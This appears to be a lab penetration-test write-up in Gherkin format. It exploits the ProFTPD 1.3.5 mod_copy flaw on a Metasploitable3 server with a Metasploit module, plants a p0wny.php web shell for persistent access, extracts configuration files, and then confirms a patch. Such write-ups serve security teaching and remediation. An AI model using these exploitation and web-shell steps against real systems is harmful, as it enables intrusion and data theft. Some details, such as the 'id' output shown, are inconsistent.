## Version 1.4.1
## language: en
Feature:
  TOE:
    metasploitable3 Ubuntu server 14.04
  Category:
    Code Injection
  Location:
    Port 21 TCP whit ProFTP 1.3.5, service ftp
  CWE:
    CWE-94: Improper Control of Generation of Code ('Code Injection')
  Rule:
    REQ.002 Identify dependencies or components
  Goal:
    Injection of code in the victim
  Recommendation:
    Update the latest version to ProFTP 1.3.6c.

  Background:
  Hacker's software:
    |    <Software name>          |    <Version>          |
    |    VMWare                   | 14.1.3 build-9474260  |
    |    Firefox Quantum          | 60.3.0esr(64-bit)     |
    |    Kali GNU/Linux Rolling   | 4.18.0-kali2-amd64    |
    |    Nmap                     | Nmap 7.70             |
    |    Metasploit               | 4.17.29-dev           |
    |    NSearch                  | Version 0.4b          |

  TOE information:
    And OpenSSH version 6.6.1p1 Ubuntu 2ubuntu2.10
    And Apache  version 2.4.7
    And ProFtp version 1.3.5
    And Netbios-ssn
    And is running on Ubuntu 14.04 with kernel Linux 3.13.0-24-generic x86_64

  Scenario: Normal use case
  In the page input url and return login
    Given I access http://ftp/<ip-server>
    And I found a login

  Scenario: Dynamic detection
    Given ip by server Ubuntu
    Then I can execute the following command:
    Then input command: nmap -O -sV 192.168.0.12
    Then I get the output:               |
    """Information ports:"""
     | Port     | State   | Service     |  Version                             |
     | 21/tcp   | open    | ftp         |  ProFTPD 1.3.5                       |
     | 22/tcp   | open    | ssh         |  OpenSSH 6.6.1p1                     |
     | 80/tcp   | open    | http        |  Apache httpd 2.4.7 ((Ubuntu))       |
     | 445/tcp  | open    | netbios-ssn |  Samba smbd 3.X - 4.X                |
     | 631/tcp  | open    | ipp         |  CUPS 1.7                            |
     | 3000/tcp | closed  | ppp         |  unknown                             |
     | 3306/tcp | open    | mysql       |  MySQL (unauthorized)                |
     | 8181/tcp | open    | http        |  WEBrick httpd 1.3.1                 |
    Then I can conclude that inside the scan I found an ftp server
    And I did verify if there were known vulnerabilities
    And I did found vulnerabilities

  Scenario: Exploitation
  Executing exploit
    Given the exploit called in metasploit exploit/unix/ftp/proftpd_modcopy_exec
    Then I get a shell, It can see [evidence](image1.png)
    Then The user is with command id of meterpreter:
    """www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"""
    Then I could conclude that
    Then I could continue extracting
    And information even though I was not a root user

  Scenario: Maintaining access
    Given The session whit a shell, update session to meterpreter
    And a shell call p0wny.php
    Then I can upload the file in php call p0wny.php
    Then I get access by running in the browser:
    """
    http://<ip-server>/p0wny.php
    """
    Then the evidence [evidence](image3.png)
    Then I can conclude that what the attacker can keep acceso
    And return whenever he wants

  Scenario Outline: Extraction
    Given I was able to extract sensitive
    Then information as configuration files
    Then of different applications
    Then own can see [evidence](image2.png)
    Then I can conclude that
    Then that information can be used to
    And continue exploiting more equipment

  Scenario: Remediation
    Given I have patched the software with release proftp 1.3.6.
    Then I get:
       """
       [*] Started reverse SSL handler on 192.168.0.14:4444
       [*] 192.168.0.15:80 - 192.168.0.15:21 -
       Connected to FTP server
       [*] 192.168.0.15:80 - 192.168.0.15:21 -
       Sending copy commands to FTP server
       [-] 192.168.0.15:80 - Exploit aborted
       due to failure: unknown: 192.168.0.15:21-
       Failure copying from /proc/self/cmdline
       [*] Exploit completed, but no session was created.
       """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
  10/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
  9.5/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
  9.5/10 (High) - CR:L/IR:L/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2018-12-12}
